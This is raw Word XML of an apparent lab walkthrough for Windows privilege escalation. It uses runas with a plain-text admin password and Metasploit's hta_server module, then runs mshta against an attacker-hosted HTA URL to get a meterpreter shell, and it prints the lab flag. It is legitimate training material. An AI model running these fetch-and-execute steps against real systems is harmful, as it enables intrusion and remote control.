        <w:t>runas.exe /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>user:administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA883D2" w14:textId="6770356C" w:rsidR="002A4D89" w:rsidRPr="002A4D89" w:rsidRDefault="002A4D89" w:rsidP="002A4D89">
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Symbol" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>runas.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t xml:space="preserve"> → a Windows command to run a program as another user.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED5CB62" w14:textId="01470AC0" w:rsidR="002A4D89" w:rsidRPr="002A4D89" w:rsidRDefault="002A4D89" w:rsidP="002A4D89">
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user:administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002A4D89">
        <w:t xml:space="preserve"> → tells it to use the </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Administrator account</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE83C00" w14:textId="0A9B8DDE" w:rsidR="002A4D89" w:rsidRPr="002A4D89" w:rsidRDefault="002A4D89" w:rsidP="002A4D89">
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t xml:space="preserve"> → the program you want to run (Command Prompt).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0474D3" w14:textId="3A52BE31" w:rsidR="002A4D89" w:rsidRPr="00666CA4" w:rsidRDefault="002A4D89" w:rsidP="00666CA4"/>
    <w:p w14:paraId="77734196" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>Admin@123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA80830" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="184ED41C" w14:textId="3D649A56" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="002A4D89" w:rsidP="00666CA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5781B004" wp14:editId="35034110">
            <wp:extent cx="5867702" cy="4819898"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="148524975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49758" name="Picture 14852497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F244" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>are running</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> cmd.exe as an administrator.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F9E81A" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Switch to the Kali Machine</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="794A1FA2" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Step 8:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t> Running the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hta_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> module to gain the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> shell. Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAC8329" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143098BC" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> -q</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276019CC" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>use exploit/windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>misc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>hta_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="27A98C6A" w14:textId="263E9EBA" w:rsidR="002A4D89" w:rsidRPr="002A4D89" w:rsidRDefault="002A4D89" w:rsidP="002A4D89">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t xml:space="preserve">This loads the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hta_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> exploit module</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7C805F" w14:textId="2A0E43C9" w:rsidR="002A4D89" w:rsidRPr="002A4D89" w:rsidRDefault="002A4D89" w:rsidP="002A4D89">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTA = HTML Application</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t xml:space="preserve"> → a special kind of file that Windows can run using mshta.exe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79558963" w14:textId="60C2A4F1" w:rsidR="002A4D89" w:rsidRPr="002A4D89" w:rsidRDefault="002A4D89" w:rsidP="002A4D89">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t xml:space="preserve"> The module creates a </w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>malicious HTA file</w:t>
      </w:r>
      <w:r w:rsidRPr="002A4D89">
        <w:t xml:space="preserve"> that, if opened on a victim’s computer, will run your payload (reverse shell, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002A4D89">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002A4D89">
        <w:t>, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599C1898" w14:textId="618482BD" w:rsidR="002A4D89" w:rsidRPr="00666CA4" w:rsidRDefault="002A4D89" w:rsidP="00666CA4"/>
    <w:p w14:paraId="2CCA751C" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFB9061" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve">“This module hosts an HTML Application (HTA) that when opened will run a payload via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>Powershell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>.”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DED7F1" w14:textId="013B4CBA" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00863EA3" w:rsidP="00666CA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AFB1C3D" wp14:editId="769FB03A">
            <wp:extent cx="5924854" cy="4051508"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="193808536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85367" name="Picture 19380853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405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1863" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve">Copy the generated payload </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>i.e</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“http://10.10.31.2:8080/Bn75U0NL8ONS.hta”</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> and run it on cmd.exe with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>mshta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> command to gain the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74274DA7" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Switch to Target Machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DAE8A5" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 9:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> Gaining a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431BC7DA" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCEBBBB" w14:textId="6C6C4681" w:rsidR="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve">mshta.exe </w:t>
      </w:r>
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="00863EA3" w:rsidRPr="00666CA4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://10.10.31.2:8080/Bn75U0NL8ONS.hta</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="791F8F8D" w14:textId="77777777" w:rsidR="00863EA3" w:rsidRPr="00863EA3" w:rsidRDefault="00863EA3" w:rsidP="00863EA3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00863EA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is mshta.exe?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD31C38" w14:textId="77777777" w:rsidR="00863EA3" w:rsidRPr="00863EA3" w:rsidRDefault="00863EA3" w:rsidP="00863EA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00863EA3">
        <w:t xml:space="preserve">mshta.exe is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00863EA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>built-in Windows program</w:t>
      </w:r>
      <w:r w:rsidRPr="00863EA3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEE5DE6" w14:textId="77777777" w:rsidR="00863EA3" w:rsidRPr="00863EA3" w:rsidRDefault="00863EA3" w:rsidP="00863EA3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00863EA3">
        <w:t xml:space="preserve">Its job is to run </w:t>
      </w:r>
      <w:r w:rsidRPr="00863EA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTA (HTML Application) files</w:t>
      </w:r>
      <w:r w:rsidRPr="00863EA3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3CF274" w14:textId="3AE37969" w:rsidR="00863EA3" w:rsidRDefault="00863EA3" w:rsidP="00666CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00863EA3">
        <w:t xml:space="preserve">HTA files look like web pages (.html) but can also run </w:t>
      </w:r>
      <w:r w:rsidRPr="00863EA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>VBScript or JScript code</w:t>
      </w:r>
      <w:r w:rsidRPr="00863EA3">
        <w:t xml:space="preserve"> with full Windows permissions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2759AEF2" w14:textId="77777777" w:rsidR="00863EA3" w:rsidRPr="00666CA4" w:rsidRDefault="00863EA3" w:rsidP="00666CA4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6504BDFD" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> You need to use your own </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> HTA server link.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F97093" w14:textId="182C020D" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00863EA3" w:rsidP="00666CA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6B576A50" wp14:editId="0BA3933C">
            <wp:extent cx="4578585" cy="571529"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="39309746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97460" name="Picture 3930974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6CD3" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve">We can expect a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633BC80C" w14:textId="48008A2C" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00863EA3" w:rsidP="00666CA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5ECA2C6D" wp14:editId="0D173B1A">
            <wp:extent cx="5835950" cy="2095608"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45723509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35097" name="Picture 4572350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6CB3" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 10:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t> Find the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6534B790" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Commands:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3272F36B" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>sessions -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00666CA4">
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF11D1E" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>cd /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F71285" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>cd C:\\Users\\Administrator\\Desktop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8E2D4A" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00666CA4">
        <w:lastRenderedPageBreak/>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="786C59D5" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>cat flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBF2B13" w14:textId="5E722CE9" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00863EA3" w:rsidP="00666CA4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D31D5E9" wp14:editId="2BFC7804">
            <wp:extent cx="5442230" cy="2527430"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="149776890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68909" name="Picture 149776890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230" cy="25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6AEC" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:t>This reveals the flag to us.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE68C51" w14:textId="603B144F" w:rsidR="00666CA4" w:rsidRPr="00666CA4" w:rsidRDefault="00666CA4" w:rsidP="00666CA4">
      <w:r w:rsidRPr="00666CA4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Flag:</w:t>
      </w:r>
      <w:r w:rsidRPr="00666CA4">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00863EA3" w:rsidRPr="00863EA3">
        <w:t>097ab83639dce0ab3429cb0349493f60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284FE69F" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="2324DD5B" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="135105BD" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="4952E70C" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="3A8AD043" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="79DB451D" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="0D164F9E" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="0F5F3453" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="5546410A" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="62E7C3A9" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="64CA80DD" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="73DC1539" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4"/>
    <w:p w14:paraId="73925354" w14:textId="59F61C53" w:rsidR="00A15F9D" w:rsidRPr="00A15F9D" w:rsidRDefault="00A15F9D" w:rsidP="00A15F9D">
      <w:r w:rsidRPr="00A15F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NOTE:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A15F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A15F9D">
        <w:t xml:space="preserve"> → A toolbox made with PowerShell scripts that hackers and security testers use to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A15F9D">
        <w:lastRenderedPageBreak/>
        <w:t>test Windows computers. It helps in many steps of hacking, like finding weak points or gaining access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F93BE64" w14:textId="065730C1" w:rsidR="00A15F9D" w:rsidRPr="00A15F9D" w:rsidRDefault="00A15F9D" w:rsidP="00A15F9D">
      <w:r w:rsidRPr="00A15F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerUp.ps1</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15F9D">
        <w:t xml:space="preserve"> → One script inside </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A15F9D">
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A15F9D">
        <w:t xml:space="preserve">. It is used to find ways to </w:t>
      </w:r>
      <w:r w:rsidRPr="00A15F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>become an admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15F9D">
        <w:t xml:space="preserve"> on Windows by spotting system mistakes (misconfigurations) that can be abused.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F8D0B4" w14:textId="0FB31E9D" w:rsidR="00A15F9D" w:rsidRDefault="00A15F9D" w:rsidP="00A15F9D"/>
    <w:p w14:paraId="4BA26845" w14:textId="6B1FA56E" w:rsidR="00A15F9D" w:rsidRPr="00A15F9D" w:rsidRDefault="00A15F9D" w:rsidP="00A15F9D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A15F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerSploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A15F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> = big hacking toolbox.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A15F9D">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A15F9D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PowerUp.ps1 = a tool from that box to find admin-level access on Windows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAA2464" w14:textId="77777777" w:rsidR="00666CA4" w:rsidRDefault="00666CA4">
      <w:pPr>
